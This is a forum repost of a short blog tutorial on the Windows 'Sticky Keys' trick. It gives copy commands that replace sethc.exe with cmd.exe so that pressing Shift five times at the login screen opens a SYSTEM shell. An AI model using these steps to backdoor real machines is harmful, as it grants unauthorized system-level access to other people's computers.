Jump to content
Nytro

Privilege Escalation via "Sticky" Keys

By Nytro, in Tutoriale in engleza

Recommended Posts

Nytro Mentor

Nytro

Posted
Posted

[h=3]Privilege Escalation via "Sticky" Keys[/h]

[h=2]Monday, April 30, 2012[/h]

This has been documented all over, but i like things to be on the blog so i can find them...

You can gain a SYSTEM shell on an application you have administrative access on or if you have physical access to the box and can boot to repair disk or linux distro and can change files.

make a copy somewhere of the original on system sethc.exe

copy c:\windows\system32\sethc.exe c:\

cp /mnt/sda3/Windows/System32/sethc.exe /mnt/sda3/sethc.exe

copy cmd.exe into sethc.exe's place

copy /y c:\windows\system32\cmd.exe c:\windows\system32\sethc.exe

or

cp /mnt/sda3/Windows/System32/cmd.exe /mnt/sda3/Windows/System32/sethc.exe

Reboot, hit Shift key 5 times, SYSTEM shell will pop up, do your thing

forgot.administrator.password.sethc_thumb.png

it would probably be nice to sethc.exe back when you are done.

Posted by CG at 12:10 PM

Sursa: Carnal0wnage & Attack Research Blog: Privilege Escalation via "Sticky" Keys

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...